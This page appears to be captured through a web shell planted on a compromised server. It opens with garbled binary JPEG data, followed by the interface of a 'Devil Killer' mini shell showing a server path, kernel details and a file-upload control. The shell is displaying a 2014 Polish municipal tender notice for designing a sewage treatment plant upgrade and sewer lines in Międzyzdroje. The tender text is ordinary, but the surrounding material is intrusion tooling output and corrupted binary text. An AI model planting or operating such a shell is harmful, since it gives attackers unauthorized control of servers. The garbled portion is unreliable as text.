JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141013/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141013/215335-N-2014.html

<p class="kh_header"><b>Międzyzdroje: Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje.</b><br>
<b>Numer ogłoszenia: 215335 - 2014; data zamieszczenia: 13.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Międzyzdroje , ul. Książąt Pomorskich 5, 72-500 Międzyzdroje, tel. 091 3275652, faks 0913275630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miedzyzdroje.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie projektu budowlano-wykonawczego na zadanie pn..Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje. 
Zamówienie obejmuje :
Część I: Wykonanie projektu budowlano-wykonawczego budowy i przebudowy oczyszczalni ścieków komunalnych w Międzyzdrojach w ramach zadania pn. Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje,
Część II: Wykonanie projektu budowlano-wykonawczego budowy sieci kanalizacji sanitarnej w ulicy Nowomyśliwskiej od skrzyżowania z ulicą Garażową do skrzyżowania z ulicą Wolińską w Międzyzdrojach w ramach zadania pn. Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje,
Część III: Wykonanie projektu budowlano-wykonawczego budowy sieci kanalizacji sanitarnej w ulicy Gryfa Pomorskiego Las od skrzyżowania z ulicą Polną do granicy Gminy Międzyzdroje, w ramach zadania pn. Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje.
A. Zakres przedmiotu zamówienia do wykonania obejmuje:
Część I: Wykonanie projektu budowlano-wykonawczego budowy i przebudowy oczyszczalni ścieków komunalnych w Międzyzdrojach w ramach zadania pn. Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje.
1. Oczyszczalnia nie posiada kompleksowego rozwiązania gospodarki ściekowej i osadowej. Część obiektów jest wyeksploatowana i wymaga pilnej przebudowy lub remontu (komory wlotowej, komora pomp, punkt zrzutu nieczystości). Proponuje się, by przy tej okazji kierować się następującymi uwagami:
a) Zaprojektować piaskownik poziomy dwukomorowy napowietrzny z łapaczem olejów i tłuszczy. Orientacyjne wymiary w rzucie piaskownika: 20, 0 x 6, 0 m.
b)Zaprojektować zbiornik retencyjny ścieków surowych. Do zbiornika kierowane byłyby ścieki przy napływie powyżej 400 m3/h.
c)Zaprojektować komorę tlenowej lub beztlenowej stabilizacji osadu.
d)Obiekty b) i c) można zaprojektować na bazie istniejącego osadnika wstępnego (Imhoffa).
e)Zaprojektować rozbudowę stacji odwadniania osadu o zespół higienizacji osadu wapnem. Obecna prasa jest zbyt mała na potrzeby oczyszczalni - zaleca się jej wymianę na większą lub ustawienie drugiej prasy.
f)Zaprojektować kompostownię lub suszarnię osadu, co pozwoli na przyrodnicze lub rolnicze wykorzystanie osadu. W przypadku kompostowni jej powierzchnia wynosiłaby około 600 m2 (Np. 40 x 16 m).
g) Zaprojektować zbiornik magazynowy osadu.
h)Zaprojektować hermetyzacje źródeł odoru - proj. Piaskownik, proj. komora tlenowej lub beztlenowej stabilizacji osadu, proj. Zbiornik retencyjny ścieków surowych.
i)Zaprojektować montaż biofiltru.
UWAGI:
 W przypadku przystąpienia do wykonania koncepcji czy też projektu przebudowy obiektu konieczne jest wykonanie serii badań laboratoryjnych ścieków surowych oraz wielkości przepływów ścieków spływających na oczyszczalnię. 
Jest to szczególnie istotne w sytuacji zasygnalizowanej w obliczeniach wg ATV niewystarczającej redukcji azotu.
ROZBUODWA  REAKTORA  BIOLOGICZNEGO O STOPIEŃ DENITRYFIKACJI
Na etapie projektowym należy przewidzieć rozbudowę reaktora biologicznego o stopień denitryfikacji w celu zmniejszenia ilości azotanów w ściekach oraz osiągnięcia programowanych parametrów. 
MODERNIZACJA I REMONT BUDYNKÓW
Na etapie projektowym należy przewidzieć remont budynków wchodzących w skład obiektu oczyszczalni ścieków. Stan techniczny przedmiotowych obiektów jest niezadowalający. 
CZĘŚĆ ELEKTRYCZNA.
 Zalecenia dotyczące urządzeń, rozdzielnic, sieci elektroenergetycznej w obiekcie Oczyszczalnia ścieków Międzyzdroje. Zalecenia te maja na celu poprawa warunków zasilania energią elektryczną w Oczyszczalni Ścieków Międzyzdroje poprzez, zagwarantowanie wyższej niezawodności dystrybucji energii oraz redukcje strat w sieci, oraz przeciwdziałanie możliwości powstania awarii mogącej zakłócić działanie Oczyszczalni Ścieków Międzyzdroje.
UKŁAD POMIAROWO-ROZLICZENIOWY W STACJI TRANSFORMATOROWEJ NR 2699.
Zaprojektować modernizację układu pomiarowo-rozliczeniowego zainstalowanego w stacji transformatorowej nr 2699. 
ROZDZIELNICA PRZEPOMPOWNI RP ( ZABUDOWANA W CENTRALNEJ PRZEPOMPOWNI ŚCIEKÓW).
Zaprojektować wymianę rozdzielnicy przepompowni RP. 
AGREGAT PRĄDOTWÓRCZY ( ZABUDOWANY W BUDYNKU STACJI TRANSFORMATOROWEJ NR 2669).
 Zaprojektować wymianę na agregatu na agregat nowszego typu np. AKMEL AP 275 z odprowadzeniem spalin z pomieszczenia. Niezbędne jest zastosowanie automatyki samoczynnego załączania rezerwy. Jednocześnie należy opracować i uzgodnić z Rejonem Dystrybucji Międzyzdroje Instrukcji współpracy agregatu z siecią zgodną z PN-IEC 60364-7-717:2004.
ZESTAWY GNIAZD REMONTOWYCH, PRZYŁĄCZA URZĄDZEŃ ZEWNĘTRZNYCH NA OBIEKCIE.
Zaprojektować wymianę rozdzielnic gniazd remontowych oraz przyłącza urządzeń umieszczonych na zewnątrz.
2. Koncepcję budowy i przebudowy oczyszczalni ścieków komunalnych w Międzyzdrojach.
3. Szczegółową inwentaryzację zadrzewienia z planem wycinki dla projektowanego terenu oczyszczalni.
4. Dokumentację projektową nasadzeń zieleni dla projektowanego terenu oczyszczalni,
-opracowanie inwentaryzacji zadrzewienia (wraz z wycinką) i zaprojektowanie nowych nasadzeni zieleni.
5. Dokumentację projektową (budowlano-wykonawczą) przebudowy istniejącego uzbrojenia podziemnego, obiektów i  urządzeń lub innych elementów kolidujących z przebudową projektowanych elementów oczyszczalni.
6.Wykonanie badań geotechnicznych.
7.Wykonanie wtórnika do celów projektowych w formie wektorowej wraz z mapą stanu władania oraz wypisem z rejestru gruntów.
8.Uzyskanie wszystkich opinii, pozwoleń, decyzji i uzgodnień, zgłoszeń robót, których dotyczy przedmiot zamówienia ponosi Wykonawca.
9.Wykonanie raportu oddziaływania na środowisko.         
Część II: Wykonanie projektu budowlano-wykonawczego budowy sieci kanalizacji sanitarnej w ulicy Nowomyśliwskiej od skrzyżowania z ulicą Garażową do skrzyżowania z ulicąWolińską w Międzyzdrojach w ramach zadania pn. Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje.
1. W ul. Nowomyśliwskiej ( w zakresie od ronda do ul. Garażowej)
- należy zaprojektować przepompownie ścieków w okolicy ronda ( w możliwie najniższym punkcie.) 
Pompownie ścieków należy zaprojektować, jako zbiornik podziemny z włazem zamykanym trudnym do podrobienia kluczem. 
Szafkę sterowniczą należy zaprojektować na oddzielnym fundamencie zlokalizowaną w bezpośrednim sąsiedztwie pompowni. 
Rurociąg tłoczny powinien pracować przy prędkości przepływu ścieków w przybliżeniu równej 1 m/s. Dopuszczalne graniczne prędkości przepływu w rurociągu (rurociągach) nie mogą być mniejsze niż 0,9 m/s, a maksymalne nie większe niż 2,5 - 3 m/s.
Dodatkowo rurociąg tłoczny i pompownię należy zaprojektować w taki sposób, aby co najmniej raz na dobę, przy jednym nieprzerwanym cyklu pracy pomp(y)) nastąpiło przepłukanie całej objętości rurociągu z prędkością nie mniejszą niż 0,9 m/s.
Wokół pompowni przewidzieć ogrodzenie z bramą zamykaną na klucz. Teren pompowni powinien być oświetlony.
Do każdej pompowni należy zaprojektować utwardzoną drogę dojazdową umożliwiającą dojazd do pompowni specjalistycznym pojazdom eksploatacyjnym będącym w posiadaniu Zamawiającego.
-  sieć kanalizacji grawitacyjne śr. Min fi 200, która umożliwi odprowadzenie ścieków sanitarnych z zabudowań i nieruchomości niezabudowanych w okolicy ronda, wraz z przyłączami.
- sieć kanalizacji ciśnieniowej 2 x fi 75 ( równolegle) na odcinku od projektowanej przepompowni do studni KS 1200 obok przepompowni ścieków ( skrzyżowanie z ul.  Garażową)   wraz ze studnią rozprężną.
2. Koncepcję budowy sieci kanalizacji sanitarnej.
3. Dokumentację projektową (budowlano-wykonawczą) budowy sieci kanalizacji sanitarnej i przyłączy kanalizacji sanitarnej w tym również ewentualną przebudowę (zmiana lokalizacji) istniejących sieci i przyłączy podyktowaną koniecznością koordynacji lokalizacji sieci kanalizacji deszczowej, sanitarnej i wodociągowej w granicach obszaru projektowanej budowy kanalizacji sanitarnej, uwzględniającą przebudowę istniejącego uzbrojenia podziemnego w przypadku stwierdzenia kolizji infrastruktury podziemnej oraz nadziemnej.
4. Szczegółową inwentaryzację zadrzewienia z planem wycinki dla projektowanego obszaru.
5. Dokumentację projektową nasadzeń zieleni dla projektowanego obszaru ulic.
-opracowanie inwentaryzacji zadrzewienia (wraz z wycinką) i zaprojektowanie nowych nasadzeni zieleni.
6. Dokumentację projektową (budowlano-wykonawczą) przebudowy istniejącego uzbrojenia podziemnego, obiektów i urządzeń lub innych elementów kolidujących z przebudową projektowanej kanalizacji sanitarnej.
7. Wykonanie badań geotechnicznych.
8. Wykonanie wtórnika do celów projektowych w formie wektorowej wraz z mapą stanu władania oraz wypisem z rejestru gruntów.
9. Uzyskanie wszystkich opinii, pozwoleń, decyzji i uzgodnień, zgłoszeń robót, których dotyczy przedmiot zamówienia ponosi Wykonawca. 
Część III: Wykonanie projektu budowlano-wykonawczego budowy sieci kanalizacji sanitarnej w ulicy Gryfa Pomorskiego Las od skrzyżowania z ulicą Polną do granicy Gminy Międzyzdroje, w ramach zadania pn. Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje.
1. W ul. Gryfa Pomorskiego Las ( w zakresie od ul. Polnej do granicy gminy)
-  należy zaprojektować przepompownie ścieków w możliwie najniższym pkt. 
Pompownie ścieków należy zaprojektować, jako zbiornik podziemny z włazem zamykanym trudnym do podrobienia kluczem. 
Szafkę sterowniczą należy zaprojektować na oddzielnym fundamencie zlokalizowaną w bezpośrednim sąsiedztwie pompowni. 
Rurociąg tłoczny powinien pracować przy prędkości przepływu ścieków w przybliżeniu równej 1 m/s. Dopuszczalne graniczne prędkości przepływu w rurociągu (rurociągach) nie mogą być mniejsze niż 0,9 m/s, a maksymalne nie większe niż 2,5 - 3 m/s.
Dodatkowo rurociąg tłoczny i pompownię należy zaprojektować w taki sposób, aby co najmniej raz na dobę, przy jednym nieprzerwanym cyklu pracy pomp(y)) nastąpiło przepłukanie całej objętości rurociągu z prędkością nie mniejszą niż 0,9 m/s.
Wokół pompowni przewidzieć ogrodzenie z bramą zamykaną na klucz. Teren pompowni powinien być oświetlony.
Do każdej pompowni należy zaprojektować utwardzoną drogę dojazdową umożliwiającą dojazd do pompowni specjalistycznym pojazdom eksploatacyjnym będącym w posiadaniu Zamawiającego.
-  sieć kanalizacji grawitacyjne śr. Min fi 200 wraz z przyłączami.
- sieć kanalizacji ciśnieniowej 2 x fi 75 ( równolegle) na odcinku od byłego ośrodka SPOŁEM do skrzyżowania z ul. Polną wraz ze studnią rozprężną.
2. Koncepcję budowy sieci kanalizacji sanitarnej.
3. Dokumentacje projektową (budowlano-wykonawczą) budowy sieci kanalizacji sanitarnej i przyłączy kanalizacji sanitarnej w tym również ewentualną przebudowę (zmiana lokalizacji) istniejących sieci i przyłączy podyktowaną koniecznością koordynacji lokalizacji sieci kanalizacji deszczowej, sanitarnej i wodociągowej w granicach obszaru projektowanej budowy kanalizacji sanitarnej, uwzględniającą przebudowę istniejącego uzbrojenia podziemnego w przypadku stwierdzenia kolizji infrastruktury podziemnej oraz nadziemnej.
4. Szczegółową inwentaryzację zadrzewienia z planem wycinki dla projektowanego obszaru.
5. Dokumentację projektową nasadzeń zieleni dla projektowanego obszaru ulic.
-opracowanie inwentaryzacji zadrzewienia (wraz z wycinką) i zaprojektowanie nowych nasadzeni zieleni.
6. Dokumentację projektową (budowlano-wykonawczą) przebudowy istniejącego uzbrojenia podziemnego, obiektów i urządzeń lub innych elementów kolidujących z przebudową projektowanej kanalizacji sanitarnej.
7. Wykonanie badań geotechnicznych.
8. Wykonanie wtórnika do celów projektowych w formie wektorowej wraz z mapą stanu władania oraz wypisem z rejestru gruntów.
9. Uzyskanie wszystkich opinii, pozwoleń, decyzji i uzgodnień, zgłoszeń robót, których dotyczy przedmiot zamówienia ponosi Wykonawca. 
B. Wymagana ilość opracowań składających się na dokumentację projektową dla każdej z projektowanych części:
a) dokumentacja projektowa budowlany - 6 egz.,
b) projekt budowlano-wykonawczy - 6 egz.,
c) szczegółowa inwentaryzacja zadrzewienia z planem wycinki - 6 egz.
d) dokumentacja projektowa nasadzeń zieleni - 6 egz.
e) dokumentacja projektowa organizacji ruchu na czas budowy - 6 egz.,
f) dokumentacja projektowa przebudowy istniejącego uzbrojenia podziemnego, obiektów i urządzeń lub innych elementów kolidujących z projektowaną budową kanalizacji sanitarnej i budową i przebudową oczyszczalni ścieków komunalnych - 6 egz. dla każdej z branż
g) kosztorysy inwestorskie z rozbiciem na branże i elementy - 3 egz.,
h) przedmiary robót z rozbiciem na elementy i branże - 3 egz.,
i) instrukcję bezpieczeństwa i ochrony zdrowia - 6 egz.,
j) dokumentację geologiczno - inżynierską - 6 egz.,
k) zbiorcze zestawienie kosztów - 4 egz.
l) specyfikację techniczną wykonania i odbioru robót dla każdej branży - 6 egz./branża,
m) wykonawca opracuje 2 komplety dokumentacji projektowej w wersji elektronicznej.
C. Wykonawca musi wykonać wtórnik do celów projektowych w formacie wektorowym w zakresie niezbędnym do przedłożonego opracowania dokumentacji budowlanej wraz z mapą stanu władania oraz wypisem z rejestru gruntów.
D. Koszt uzyskania wszystkich opinii, pozwoleń, decyzji i uzgodnień, których dotyczy przedmiot zamówienia ponosi Wykonawca.
E. Przy opracowywaniu dokumentacji projektowej po stronie Wykonawcy leży powiadomienie gestorów sieci np: Telekomunikacji, Zakładu Energetycznego, Zakładu Gazowniczego, Zakładu Wodociągów i kanalizacji i innych o planowanej inwestycji, posiadających swoje uzbrojenie w granicach pasa drogowego, aby mogli przewidzieć modernizację swoich sieci podczas realizacji inwestycji. 
F. Wykonawca musi uzyskać wszelkie niezbędne warunki techniczne, przyłączeniowe, opinie i zezwolenia oraz ostateczną decyzję pozwolenia na budowę, uzgodnić dokumentację ZUD, uzyskać prawomocną decyzję o ustaleniu lokalizacji inwestycji celu publicznego, decyzje środowiskowe lub raport  oddziaływania na środowisko, pozwolenie wodno-prawne w wymaganym zakresie, decyzje na wycinkę drzew, zatwierdzenie tymczasowej organizacji ruchu, ( jeśli dotyczy).
G. Dokumentację projektową należy opracować zgodnie z Prawem zamówień publicznych i wydanymi na jej podstawie uregulowaniami prawnymi w tym zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 r., Nr 202, poz. 2072 z póź. zm.). 
H. Przedmiary robót i kosztorysy inwestorskie należy opracować zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz.U. z 2004 r., Nr 130, poz. 1389 z późń. zm). 
I. Specyfikację techniczną wykonania i odbioru robót, stanowiącą opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót należy opracować zgodnie z prawem zamówień publicznych oraz Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 
roku (Dz. U. z 2004r., Nr 202, poz. 2072 z późn. zm) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego.                                                                                                   Przedmiot zamówienia jest współfinansowany z Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013 Priorytet  I Gospodarka wodno - ściekowa  Działanie 1.1. Gospodarka Wodno - ściekowa w aglomeracjach powyżej 15 tys. RLM .
Kod CPV   
71320000 - 7  Usługi  inżynieryjne w zakresie projektowania 
71322000 - 1  Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej 
71332000 - 4  Geotechniczne usługi inżynieryjne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.33.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ CZĘŚĆ I warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej 2 usługi obejmujące swoim zakresem zaprojektowanie budowy lub/i przebudowy oczyszczalni ścieków komunalnych na kwotę min. 500 000,00 złotych brutto  każda z usług.
Wykonawca nie może sumować wartości kilku usług  o mniejszym zakresie dla uzyskania   
wymaganej  wartości porównywalnej.
b/ CZĘŚĆ II warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej 2 usługi obejmujące swoim zakresem zaprojektowanie budowy lub/i przebudowy lub/i wymiany kanalizacji sanitarnej za kwotę min.15 000 złotych brutto każda z usług.
Wykonawca nie może sumować wartości kilku usług  o mniejszym zakresie dla uzyskania   
wymaganej  wartości porównywalnej.
c/ CZĘŚĆ III warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej 2 usługi obejmujące swoim zakresem zaprojektowanie budowy lub/i przebudowy lub/i wymiany kanalizacji sanitarnej za kwotę min.15 000 złotych brutto każda z usług. 
Wykonawca nie może sumować wartości kilku usług  o mniejszym zakresie dla uzyskania   
wymaganej  wartości porównywalnej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a/ CZĘŚĆ I warunek zostanie uznany za spełniony, jeżeli Wykonawca dysponuje, osobami niezbędnymi do realizacji przedmiotu zamówienia tj.: 
1/ co najmniej jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń  w specjalności  konstrukcyjno - budowlanej oraz co najmniej pięcioletnie doświadczenie zawodowe liczone od dnia uzyskania uprawnień. 
2/ co najmniej  jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych i gazowych  oraz co najmniej pięcioletnie doświadczenie zawodowe liczone od dnia uzyskania uprawnień. 


3/ co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych.
b/ CZĘŚĆ II warunek zostanie uznany za spełniony, jeżeli Wykonawca dysponuje, osobami niezbędnymi do realizacji przedmiotu zamówienia tj. 
1/  co najmniej  jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych i gazowych  oraz co najmniej pięcioletnie doświadczenie zawodowe liczone od dnia uzyskania uprawnień. 
2/ co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych. 
c/ CZĘŚĆ III warunek zostanie uznany za spełniony, jeżeli Wykonawca dysponuje, osobami niezbędnymi do realizacji przedmiotu zamówienia tj. 
1/  co najmniej  jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych i gazowych  oraz co najmniej pięcioletnie doświadczenie zawodowe liczone od dnia uzyskania uprawnień. 
2/ co najmniej jedną osobą posiadającą uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych . 
UWAGA  dotycząca wszystkich stanowisk wskazanych powyżej a odnoszących się do uprawnień budowlanych.
